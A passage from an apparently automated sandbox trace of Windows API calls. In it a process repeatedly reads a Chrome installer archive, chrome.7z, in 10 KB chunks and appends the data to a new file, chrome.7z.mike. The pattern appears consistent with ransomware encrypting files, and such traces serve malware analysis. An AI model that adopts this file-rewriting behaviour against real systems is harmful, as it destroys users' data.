lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z.mike", lpFilePart=0x0) returned 0x57 [0179.305] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z.mike" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\installer\\chrome.7z.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0179.306] GetFileType (hFile=0x1c8) returned 0x1 [0179.306] GetFileType (hFile=0x1c8) returned 0x1 [0179.306] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af178*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af178*=0) returned 0x4689a20 [0179.307] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z", nBufferLength=0x105, lpBuffer=0x2aeca0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z", lpFilePart=0x0) returned 0x52 [0179.307] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\installer\\chrome.7z"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0179.307] GetFileType (hFile=0x1c8) returned 0x1 [0179.307] GetFileType (hFile=0x1c8) returned 0x1 [0179.307] ReadFile (in: hFile=0x1c8, lpBuffer=0x215bd88, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af230, lpOverlapped=0x0 | out: lpBuffer=0x215bd88*, lpNumberOfBytesRead=0x2af230*=0x2800, lpOverlapped=0x0) returned 1 [0179.308] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z.mike", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z.mike", lpFilePart=0x0) returned 0x57 [0179.309] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z.mike" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\installer\\chrome.7z.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0179.309] GetFileType (hFile=0x1c8) returned 0x1 [0179.309] GetFileType (hFile=0x1c8) returned 0x1 [0179.309] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af178*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af178*=0) returned 0x468c220 [0179.310] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z", nBufferLength=0x105, lpBuffer=0x2aeca0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z", lpFilePart=0x0) returned 0x52 [0179.310] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\installer\\chrome.7z"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0179.310] GetFileType (hFile=0x1c8) returned 0x1 [0179.311] GetFileType (hFile=0x1c8) returned 0x1 [0179.311] ReadFile (in: hFile=0x1c8, lpBuffer=0x2168d70, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af230, lpOverlapped=0x0 | out: lpBuffer=0x2168d70*, lpNumberOfBytesRead=0x2af230*=0x2800, lpOverlapped=0x0) returned 1 [0179.312] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z.mike", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z.mike", lpFilePart=0x0) returned 0x57 [0179.312] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z.mike" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\installer\\chrome.7z.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0179.312] GetFileType (hFile=0x1c8) returned 0x1 [0179.312] GetFileType (hFile=0x1c8) returned 0x1 [0179.313] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af178*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af178*=0) returned 0x468ea20 [0179.313] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z", nBufferLength=0x105, lpBuffer=0x2aeca0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z", lpFilePart=0x0) returned 0x52 [0179.313] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\installer\\chrome.7z"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0179.314] GetFileType (hFile=0x1c8) returned 0x1 [0179.314] GetFileType (hFile=0x1c8) returned 0x1 [0179.314] ReadFile (in: hFile=0x1c8, lpBuffer=0x2175d58, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af230, lpOverlapped=0x0 | out: lpBuffer=0x2175d58*, lpNumberOfBytesRead=0x2af230*=0x2800, lpOverlapped=0x0) returned 1 [0179.315] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z.mike", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z.mike", lpFilePart=0x0) returned 0x57 [0179.315] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z.mike" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\installer\\chrome.7z.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0179.315] GetFileType (hFile=0x1c8) returned 0x1 [0179.316] GetFileType (hFile=0x1c8) returned 0x1 [0179.316] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af178*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af178*=0) returned 0x4691220 [0179.316] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z", nBufferLength=0x105, lpBuffer=0x2aeca0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z", lpFilePart=0x0) returned 0x52 [0179.316] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\installer\\chrome.7z"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0179.317] GetFileType (hFile=0x1c8) returned 0x1 [0179.317] GetFileType (hFile=0x1c8) returned 0x1 [0179.317] ReadFile (in: hFile=0x1c8, lpBuffer=0x2182d40, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af230, lpOverlapped=0x0 | out: lpBuffer=0x2182d40*, lpNumberOfBytesRead=0x2af230*=0x2800, lpOverlapped=0x0) returned 1 [0179.318] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z.mike", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z.mike", lpFilePart=0x0) returned 0x57 [0179.318] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z.mike" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\installer\\chrome.7z.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0179.319] GetFileType (hFile=0x1c8) returned 0x1 [0179.319] GetFileType (hFile=0x1c8) returned 0x1 [0179.319] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af178*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af178*=0) returned 0x4693a20 [0179.319] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z", nBufferLength=0x105, lpBuffer=0x2aeca0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z", lpFilePart=0x0) returned 0x52 [0179.320] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\installer\\chrome.7z"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0179.320] GetFileType (hFile=0x1c8) returned 0x1 [0179.320] GetFileType (hFile=0x1c8) returned 0x1 [0179.320] ReadFile (in: hFile=0x1c8, lpBuffer=0x218fd28, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af230, lpOverlapped=0x0 | out: lpBuffer=0x218fd28*, lpNumberOfBytesRead=0x2af230*=0x2800, lpOverlapped=0x0) returned 1 [0179.321] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z.mike", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z.mike", lpFilePart=0x0) returned 0x57 [0179.321] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z.mike" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\installer\\chrome.7z.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0179.322] GetFileType (hFile=0x1c8) returned 0x1 [0179.322] GetFileType (hFile=0x1c8) returned 0x1 [0179.322] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af178*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af178*=0) returned 0x4696220 [0179.322] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z", nBufferLength=0x105, lpBuffer=0x2aeca0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z", lpFilePart=0x0) returned 0x52 [0179.323] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\installer\\chrome.7z"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0179.323] GetFileType (hFile=0x1c8) returned 0x1 [0179.323] GetFileType (hFile=0x1c8) returned 0x1 [0179.323] ReadFile (in: hFile=0x1c8, lpBuffer=0x219cd10, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af230, lpOverlapped=0x0 | out: lpBuffer=0x219cd10*, lpNumberOfBytesRead=0x2af230*=0x2800, lpOverlapped=0x0) returned 1 [0179.324] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z.mike", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z.mike", lpFilePart=0x0) returned 0x57 [0179.325] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z.mike" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\installer\\chrome.7z.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0179.325] GetFileType (hFile=0x1c8) returned 0x1 [0179.325] GetFileType (hFile=0x1c8) returned 0x1 [0179.325] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af178*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af178*=0) returned 0x4698a20 [0179.326] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z", nBufferLength=0x105, lpBuffer=0x2aeca0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z", lpFilePart=0x0) returned 0x52 [0179.326] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\installer\\chrome.7z"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0179.326] GetFileType (hFile=0x1c8) returned 0x1 [0179.326] GetFileType (hFile=0x1c8) returned 0x1 [0179.327] ReadFile (in: hFile=0x1c8, lpBuffer=0x21a9cf8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af230, lpOverlapped=0x0 | out: lpBuffer=0x21a9cf8*, lpNumberOfBytesRead=0x2af230*=0x2800, lpOverlapped=0x0) returned 1 [0179.328] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z.mike", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z.mike", lpFilePart=0x0) returned 0x57 [0179.328] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z.mike" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\installer\\chrome.7z.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0179.328] GetFileType (hFile=0x1c8) returned 0x1 [0179.328] GetFileType (hFile=0x1c8) returned 0x1 [0179.328] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af178*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af178*=0) returned 0x469b220 [0179.329] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z", nBufferLength=0x105, lpBuffer=0x2aeca0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z", lpFilePart=0x0) returned 0x52 [0179.329] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\installer\\chrome.7z"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0179.329] GetFileType (hFile=0x1c8) returned 0x1 [0179.330] GetFileType (hFile=0x1c8) returned 0x1 [0179.330] ReadFile (in: hFile=0x1c8, lpBuffer=0x21b6ce0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af230, lpOverlapped=0x0 | out: lpBuffer=0x21b6ce0*, lpNumberOfBytesRead=0x2af230*=0x2800, lpOverlapped=0x0) returned 1 [0179.332] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z.mike", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z.mike", lpFilePart=0x0) returned 0x57 [0179.332] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z.mike" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\installer\\chrome.7z.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0179.332] GetFileType (hFile=0x1c8) returned 0x1 [0179.332] GetFileType (hFile=0x1c8) returned 0x1 [0179.333] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af178*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af178*=0) returned 0x469da20 [0179.333] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z", nBufferLength=0x105, lpBuffer=0x2aeca0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z", lpFilePart=0x0) returned 0x52 [0179.333] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\installer\\chrome.7z"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0179.334] GetFileType (hFile=0x1c8) returned 0x1 [0179.334] GetFileType (hFile=0x1c8) returned 0x1 [0179.334] ReadFile (in: hFile=0x1c8, lpBuffer=0x21c3cc8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af230, lpOverlapped=0x0 | out: lpBuffer=0x21c3cc8*, lpNumberOfBytesRead=0x2af230*=0x2800, lpOverlapped=0x0) returned 1 [0179.335] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z.mike", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z.mike", lpFilePart=0x0) returned 0x57 [0179.335] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z.mike" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\installer\\chrome.7z.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0179.335] GetFileType (hFile=0x1c8) returned 0x1 [0179.336] GetFileType (hFile=0x1c8) returned 0x1 [0179.336] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af178*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af178*=0) returned 0x46a0220 [0179.336] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z", nBufferLength=0x105, lpBuffer=0x2aeca0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z", lpFilePart=0x0) returned 0x52 [0179.337] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\installer\\chrome.7z"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0179.337] GetFileType (hFile=0x1c8) returned 0x1 [0179.337] GetFileType (hFile=0x1c8) returned 0x1 [0179.337] ReadFile (in: hFile=0x1c8, lpBuffer=0x21d0cb0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af230, lpOverlapped=0x0 | out: lpBuffer=0x21d0cb0*, lpNumberOfBytesRead=0x2af230*=0x2800, lpOverlapped=0x0) returned 1 [0179.338] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z.mike", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z.mike", lpFilePart=0x0) returned 0x57 [0179.339] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z.mike" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\installer\\chrome.7z.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0179.339] GetFileType (hFile=0x1c8) returned 0x1 [0179.339] GetFileType (hFile=0x1c8) returned 0x1 [0179.339] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af178*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af178*=0) returned 0x46a2a20 [0179.340] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z", nBufferLength=0x105, lpBuffer=0x2aeca0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z", lpFilePart=0x0) returned 0x52 [0179.340] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\installer\\chrome.7z"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0179.340] GetFileType (hFile=0x1c8) returned 0x1 [0179.340] GetFileType (hFile=0x1c8) returned 0x1 [0179.341] ReadFile (in: hFile=0x1c8, lpBuffer=0x21ddc98, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af230, lpOverlapped=0x0 | out: lpBuffer=0x21ddc98*, lpNumberOfBytesRead=0x2af230*=0x2800, lpOverlapped=0x0) returned 1 [0179.342] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z.mike", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z.mike", lpFilePart=0x0) returned 0x57 [0179.342] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z.mike" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\installer\\chrome.7z.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0179.342] GetFileType (hFile=0x1c8) returned 0x1 [0179.342] GetFileType (hFile=0x1c8) returned 0x1 [0179.342] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af178*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af178*=0) returned 0x46a5220 [0179.343] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z", nBufferLength=0x105, lpBuffer=0x2aeca0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z", lpFilePart=0x0) returned 0x52 [0179.343] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\installer\\chrome.7z"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0179.343] GetFileType (hFile=0x1c8) returned 0x1 [0179.343] GetFileType (hFile=0x1c8) returned 0x1 [0179.344] ReadFile (in: hFile=0x1c8, lpBuffer=0x21eac80, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af230, lpOverlapped=0x0 | out: lpBuffer=0x21eac80*, lpNumberOfBytesRead=0x2af230*=0x2800, lpOverlapped=0x0) returned 1 [0179.345] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z.mike", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z.mike", lpFilePart=0x0) returned 0x57 [0179.345] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z.mike" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\installer\\chrome.7z.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0179.345] GetFileType (hFile=0x1c8) returned 0x1 [0179.345] GetFileType (hFile=0x1c8) returned 0x1 [0179.345] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af178*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af178*=0) returned 0x46a7a20 [0179.346] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z", nBufferLength=0x105, lpBuffer=0x2aeca0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z", lpFilePart=0x0) returned 0x52 [0179.346] CreateFileW (lpFileName="C:\\Program 